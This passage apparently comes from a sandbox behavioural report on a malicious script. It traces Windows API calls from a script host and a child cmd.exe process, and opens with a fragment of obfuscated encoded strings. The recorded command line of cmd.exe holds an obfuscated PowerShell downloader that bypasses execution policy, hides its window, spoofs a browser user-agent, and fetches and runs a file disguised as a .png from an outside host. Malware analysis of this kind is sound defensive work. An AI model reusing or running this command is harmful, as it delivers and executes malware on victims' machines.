8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0119.723] GetProcessHeap () returned 0x180000
	[0119.723] RtlReAllocateHeap (Heap=0x180000, Flags=0x0, Ptr=0x1b8430, Size=0x11238) returned 0x1eae20
	[0119.724] ??2@YAPEAX_K@Z () returned 0x2f480
	[0119.724] GetCurrentThreadId () returned 0x6d8
	[0119.724] realloc (_Block=0x0, _Size=0xc8) returned 0x2f4e0
	[0119.724] ??2@YAPEAX_K@Z () returned 0x2f5b0
	[0119.724] malloc (_Size=0x1008) returned 0x2a4f0
	[0119.724] ??2@YAPEAX_K@Z () returned 0x2f5f0
	[0119.725] malloc (_Size=0x108) returned 0x27d80
	[0119.725] malloc (_Size=0x208) returned 0x2f7a0
	[0119.725] malloc (_Size=0x200) returned 0x2f9b0
	[0119.725] malloc (_Size=0x408) returned 0x2fbc0
	[0119.725] malloc (_Size=0x2008) returned 0x2b500
	[0119.726] malloc (_Size=0x808) returned 0x2d510
	[0119.726] malloc (_Size=0x1008) returned 0x2dd20
	[0119.727] malloc (_Size=0x4008) returned 0x2fdfd0
	[0119.727] malloc (_Size=0x2008) returned 0x301fe0
	[0119.730] malloc (_Size=0x4008) returned 0x303ff0
	[0119.877] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0119.877] CObjectContext::Release () returned 0x1
	[0119.877] GetTickCount () returned 0x2e530
	[0119.878] ??2@YAPEAX_K@Z () returned 0x306560
	[0119.878] ??2@YAPEAX_K@Z () returned 0x306590
	[0119.879] ??2@YAPEAX_K@Z () returned 0x3065c0
	[0119.879] ??2@YAPEAX_K@Z () returned 0x3065f0
	[0119.880] ??2@YAPEAX_K@Z () returned 0x306620
	[0119.880] ??2@YAPEAX_K@Z () returned 0x306650
	[0119.881] ??2@YAPEAX_K@Z () returned 0x306680
	[0119.881] ??2@YAPEAX_K@Z () returned 0x3066b0
	[0119.881] ??2@YAPEAX_K@Z () returned 0x3066e0
	[0119.882] ??2@YAPEAX_K@Z () returned 0x306710
	[0119.882] ??2@YAPEAX_K@Z () returned 0x306740
	[0119.883] ??2@YAPEAX_K@Z () returned 0x306770
	[0119.883] ??2@YAPEAX_K@Z () returned 0x3067a0
	[0119.886] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0119.886] CObjectContext::Release () returned 0x1
	[0119.886] GetTickCount () returned 0x2e530
	[0119.887] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0119.887] CObjectContext::Release () returned 0x1
	[0119.887] GetTickCount () returned 0x2e530
	[0119.889] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0119.890] CObjectContext::Release () returned 0x1
	[0119.890] GetTickCount () returned 0x2e53f
	[0119.890] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0119.890] CObjectContext::Release () returned 0x1
	[0119.891] GetTickCount () returned 0x2e53f
	[0119.891] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0119.891] CObjectContext::Release () returned 0x1
	[0119.891] GetTickCount () returned 0x2e53f
	[0119.895] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0119.895] CObjectContext::Release () returned 0x1
	[0119.895] GetTickCount () returned 0x2e53f
	[0119.899] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0119.899] CObjectContext::Release () returned 0x1
	[0119.899] GetTickCount () returned 0x2e53f
	[0119.900] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0119.900] CObjectContext::Release () returned 0x1
	[0119.900] GetTickCount () returned 0x2e53f
	[0119.901] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0119.901] CObjectContext::Release () returned 0x1
	[0119.901] GetTickCount () returned 0x2e53f
	[0119.902] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0119.902] CObjectContext::Release () returned 0x1
	[0119.902] GetTickCount () returned 0x2e53f
	[0119.903] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0120.169] CObjectContext::Release () returned 0x1
	[0120.169] GetTickCount () returned 0x2e658
	[0120.172] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0120.172] CObjectContext::Release () returned 0x1
	[0120.172] GetTickCount () returned 0x2e658
	[0120.175] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0120.175] CObjectContext::Release () returned 0x1
	[0120.175] GetTickCount () returned 0x2e658
	[0120.176] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0120.176] CObjectContext::Release () returned 0x1
	[0120.176] GetTickCount () returned 0x2e658
	[0120.178] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0120.178] CObjectContext::Release () returned 0x1
	[0120.178] GetTickCount () returned 0x2e658
	[0120.179] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0120.179] CObjectContext::Release () returned 0x1
	[0120.179] GetTickCount () returned 0x2e658
	[0120.181] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0120.181] CObjectContext::Release () returned 0x1
	[0120.181] GetTickCount () returned 0x2e658
	[0120.181] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x20007f8
	[0120.182] LoadResource (hModule=0x7fee13d0000, hResInfo=0x20007f8) returned 0x2001d44
	[0120.182] LockResource (hResData=0x2001d44) returned 0x2001d44
	[0120.182] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x20007f8) returned 0x15c
	[0120.183] FreeResource (hResData=0x2001d44) returned 0
	[0120.183] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x20007e8
	[0120.183] LoadResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0x2001c74
	[0120.183] LockResource (hResData=0x2001c74) returned 0x2001c74
	[0120.183] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0xce
	[0120.184] FreeResource (hResData=0x2001c74) returned 0
	[0120.184] bsearch (_Key=0x17cf38, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0120.184] ??2@YAPEAX_K@Z () returned 0x340a20
	[0120.186] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0120.186] CObjectContext::Release () returned 0x1
	[0120.186] GetTickCount () returned 0x2e668
	[0120.188] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0120.188] CObjectContext::Release () returned 0x1
	[0120.188] GetTickCount () returned 0x2e668
	[0120.189] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0120.189] CObjectContext::Release () returned 0x1
	[0120.189] GetTickCount () returned 0x2e668
	[0120.190] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0120.190] CObjectContext::Release () returned 0x1
	[0120.190] GetTickCount () returned 0x2e668
	[0120.193] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0120.193] CObjectContext::Release () returned 0x1
	[0120.193] GetTickCount () returned 0x2e668
	[0120.195] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0120.195] CObjectContext::Release () returned 0x1
	[0120.195] GetTickCount () returned 0x2e668
	[0120.197] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0120.197] CObjectContext::Release () returned 0x1
	[0120.197] GetTickCount () returned 0x2e668
	[0120.199] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0120.199] CObjectContext::Release () returned 0x1
	[0120.199] GetTickCount () returned 0x2e668
	[0120.201] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0120.201] CObjectContext::Release () returned 0x1
	[0120.201] GetTickCount () returned 0x2e677
	[0120.205] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0120.205] CObjectContext::Release () returned 0x1
	[0120.205] GetTickCount () returned 0x2e677
	[0120.210] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0120.210] CObjectContext::Release () returned 0x1
	[0120.210] GetTickCount () returned 0x2e677
	[0120.214] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0120.214] CObjectContext::Release () returned 0x1
	[0120.214] GetTickCount () returned 0x2e677
	[0120.349] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0120.349] CObjectContext::Release () returned 0x1
	[0120.349] GetTickCount () returned 0x2e704
	[0120.353] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0120.353] CObjectContext::Release () returned 0x1
	[0120.353] GetTickCount () returned 0x2e704
	[0120.358] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0120.358] CObjectContext::Release () returned 0x1
	[0120.358] GetTickCount () returned 0x2e713
	[0120.362] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0120.362] CObjectContext::Release () returned 0x1
	[0120.362] GetTickCount () returned 0x2e713
	[0120.365] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0120.365] CObjectContext::Release () returned 0x1
	[0120.365] GetTickCount () returned 0x2e713
	[0120.369] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0120.369] CObjectContext::Release () returned 0x1
	[0120.369] GetTickCount () returned 0x2e713
	[0120.375] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0120.375] CObjectContext::Release () returned 0x1
	[0120.375] GetTickCount () returned 0x2e723
	[0120.379] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0120.379] CObjectContext::Release () returned 0x1
	[0120.379] GetTickCount () returned 0x2e723
	[0120.384] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0120.384] CObjectContext::Release () returned 0x1
	[0120.384] GetTickCount () returned 0x2e723
	[0120.555] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0120.555] CObjectContext::Release () returned 0x1
	[0120.555] GetTickCount () returned 0x2e7ce
	[0120.568] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0120.568] CObjectContext::Release () returned 0x1
	[0120.568] GetTickCount () returned 0x2e7de
	[0120.571] _resetstkoflw () returned 0x1
	[0120.572] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x2000718
	[0120.572] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2000718) returned 0x2000b6c
	[0120.572] LockResource (hResData=0x2000b6c) returned 0x2000b6c
	[0120.572] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2000718) returned 0x86
	[0120.574] FreeResource (hResData=0x2000b6c) returned 0
	[0120.574] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x20007e8
	[0120.574] LoadResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0x2001c74
	[0120.574] LockResource (hResData=0x2001c74) returned 0x2001c74
	[0120.574] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0xce
	[0120.575] FreeResource (hResData=0x2001c74) returned 0
	[0120.575] bsearch (_Key=0x930f8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0120.575] ??2@YAPEAX_K@Z () returned 0x39ec50
	[0120.584] CreateErrorInfo (in: pperrinfo=0x17bdd0 | out: pperrinfo=0x17bdd0*=0x1ca718) returned 0x0
	[0120.585] CErrorObject::SetGUID () returned 0x0
	[0120.585] CErrorObject::SetSource () returned 0x0
	[0120.585] LoadStringW (in: hInstance=0x7fedf7a0000, uID=0x1004, lpBuffer=0x17a510, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0120.585] FormatMessageW (in: dwFlags=0x500, lpSource=0x1ce558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x17bde0, nSize=0x0, Arguments=0x17be50 | out: lpBuffer="\xd380\x21") returned 0x31
	[0120.585] CErrorObject::SetDescription () returned 0x0
	[0120.585] CErrorObject::SetHelpFile () returned 0x0
	[0120.585] CErrorObject::SetHelpContext () returned 0x0
	[0120.585] QueryInterface () returned 0x0
	[0120.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x1ca710) returned 0x0
	[0120.586] Release () returned 0x2
	[0120.586] IUnknown:Release (This=0x1ca710) returned 0x1
	[0120.586] LocalFree (hMem=0x21d380) returned 0x0
	[0120.586] IUnknown:Release (This=0x21c0f0) returned 0x1
	[0120.586] GetTickCount () returned 0x2e7ee
	[0120.586] bsearch (_Key=0x17cf38, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a3e0
	[0120.586] ??2@YAPEAX_K@Z () returned 0x3a7650
	[0120.588] SetItemAlloc () returned 0x0
	[0120.588] Release () returned 0x1
	[0120.588] QueryInterface () returned 0x80004002
	[0120.588] QueryInterface () returned 0x80004002
	[0120.589] QueryInterface () returned 0x80004002
	[0120.589] QueryInterface () returned 0x80004002
	[0120.589] QueryInterface () returned 0x0
	[0120.589] Release () returned 0x1
	[0120.589] realloc (_Block=0x342b40, _Size=0x140) returned 0x301f30
	[0120.703] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0120.703] CObjectContext::Release () returned 0x1
	[0120.703] GetTickCount () returned 0x2e86a
	[0120.707] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0120.707] CObjectContext::Release () returned 0x1
	[0120.707] GetTickCount () returned 0x2e86a
	[0120.710] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x2000718
	[0120.710] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2000718) returned 0x2000b6c
	[0120.710] LockResource (hResData=0x2000b6c) returned 0x2000b6c
	[0120.710] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2000718) returned 0x86
	[0120.711] FreeResource (hResData=0x2000b6c) returned 0
	[0120.711] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x20007e8
	[0120.711] LoadResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0x2001c74
	[0120.711] LockResource (hResData=0x2001c74) returned 0x2001c74
	[0120.711] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x20007e8) returned 0xce
	[0120.712] FreeResource (hResData=0x2001c74) returned 0
	[0120.712] bsearch (_Key=0x930f8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0122.676] PostMessageA (hWnd=0x10274, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0122.677] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x17f770*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0122.677] CloseHandle (hObject=0xd4) returned 1
	[0122.677] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.678] IUnknown:Release (This=0x1ae5f0) returned 0x0
	[0122.678] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.678] IUnknown:Release (This=0x1ae6a0) returned 0x0
	[0122.678] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.678] IUnknown:Release (This=0x1ae750) returned 0x0
	[0122.678] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.678] IUnknown:Release (This=0x1ae540) returned 0x0
	[0122.693] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.693] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.693] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.693] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.694] GetProcessHeap () returned 0x180000
	[0122.694] HeapFree (in: hHeap=0x180000, dwFlags=0x0, lpMem=0x1eae20 | out: hHeap=0x180000) returned 1
	[0122.694] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.694] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x17f7a0 | out: lplpMessageFilter=0x17f7a0*=0x25f80) returned 0x0
	[0122.694] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.694] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.694] ??3@YAXPEAX@Z () returned 0x461fe701
	[0122.694] CoUninitialize () 
	[0122.694] DllCanUnloadNow () returned 0x0
	[0122.694] DllCanUnloadNow () 

Thread:
	id = 304
	os_tid = 0x760


Thread:
	id = 305
	os_tid = 0x4b8

	[0119.255] GetClassInfoA (in: hInstance=0xffa90000, lpClassName="WSH-Timer", lpWndClass=0x263fdb0 | out: lpWndClass=0x263fdb0) returned 0
	[0119.255] RegisterClassA (lpWndClass=0x263fdb0) returned 0x9006ac138
	[0119.255] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffa90000, lpParam=0x25a60) returned 0x10274
	[0119.256] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x0
	[0119.256] NtdllDefWindowProc_A (hWnd=0x10274, Msg=0x24, wParam=0x0, lParam=0x263f7a0) returned 0x0
	[0119.256] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x0
	[0119.256] SetWindowLongPtrA (hWnd=0x10274, nIndex=-21, dwNewLong=0x25a60) returned 0x0
	[0119.256] NtdllDefWindowProc_A (hWnd=0x10274, Msg=0x81, wParam=0x0, lParam=0x263f760) returned 0x1
	[0119.257] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x25a60
	[0119.257] NtdllDefWindowProc_A (hWnd=0x10274, Msg=0x83, wParam=0x0, lParam=0x263f7c0) returned 0x0
	[0119.259] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x25a60
	[0119.259] NtdllDefWindowProc_A (hWnd=0x10274, Msg=0x1, wParam=0x0, lParam=0x263f760) returned 0x0
	[0119.260] SetEvent (hEvent=0xcc) returned 1
	[0119.292] GetMessageA (in: lpMsg=0x263fd80, hWnd=0x10274, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x263fd80) returned 0
	[0122.673] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x25a60
	[0122.674] GetWindowLongPtrA (hWnd=0x10274, nIndex=-21) returned 0x25a60

Thread:
	id = 309
	os_tid = 0x4f4


Thread:
	id = 310
	os_tid = 0x6ec


Thread:
	id = 314
	os_tid = 0xc1c


Thread:
	id = 315
	os_tid = 0xc24


Thread:
	id = 316
	os_tid = 0xc28


Thread:
	id = 317
	os_tid = 0xc44


Thread:
	id = 326
	os_tid = 0xc8c


Process:
	id = "37"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x2f5e5000"
	os_pid = "0x8c0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "35"
	os_parent_pid = "0x978"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 308
	os_tid = 0x728

	[0121.046] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f790 | out: lpSystemTimeAsFileTime=0x18f790*(dwLowDateTime=0xc0599d70, dwHighDateTime=0x1d543d1)) 
	[0121.046] GetCurrentProcessId () returned 0x8c0
	[0121.047] GetCurrentThreadId () returned 0x728
	[0121.047] GetTickCount () returned 0x2e9c2
	[0121.047] QueryPerformanceCounter (in: lpPerformanceCount=0x18f798 | out: lpPerformanceCount=0x18f798*=24547266980) returned 1
	[0121.048] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0121.048] __set_app_type (_Type=0x1) 
	[0121.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0121.048] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0121.048] GetCurrentThreadId () returned 0x728
	[0121.048] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x728) returned 0x3c
	[0121.049] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0121.049] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0121.049] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0121.049] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0121.049] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f728 | out: phkResult=0x18f728*=0x0) returned 0x2
	[0121.049] VirtualQuery (in: lpAddress=0x18f710, lpBuffer=0x18f690, dwLength=0x30 | out: lpBuffer=0x18f690*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.049] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f690, dwLength=0x30 | out: lpBuffer=0x18f690*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.049] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f690, dwLength=0x30 | out: lpBuffer=0x18f690*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.049] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f690, dwLength=0x30 | out: lpBuffer=0x18f690*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.049] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f690, dwLength=0x30 | out: lpBuffer=0x18f690*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0121.049] GetConsoleOutputCP () returned 0x1b5
	[0121.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.050] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0121.050] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.050] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0121.050] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0121.050] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.050] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0121.051] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.051] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0121.051] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.051] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0121.051] GetEnvironmentStringsW () returned 0x268f20*
	[0121.051] GetProcessHeap () returned 0x250000
	[0121.051] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xad4) returned 0x269a00
	[0121.051] FreeEnvironmentStringsW (penv=0x268f20) returned 1
	[0121.051] GetProcessHeap () returned 0x250000
	[0121.051] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x8) returned 0x2687a0
	[0121.051] GetEnvironmentStringsW () returned 0x268f20*
	[0121.051] GetProcessHeap () returned 0x250000
	[0121.052] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xad4) returned 0x26a4e0
	[0121.052] FreeEnvironmentStringsW (penv=0x268f20) returned 1
	[0121.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e5e8 | out: phkResult=0x18e5e8*=0x44) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x18, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x1, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x1, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x0, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x40, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x40, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x40, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegCloseKey (hKey=0x44) returned 0x0
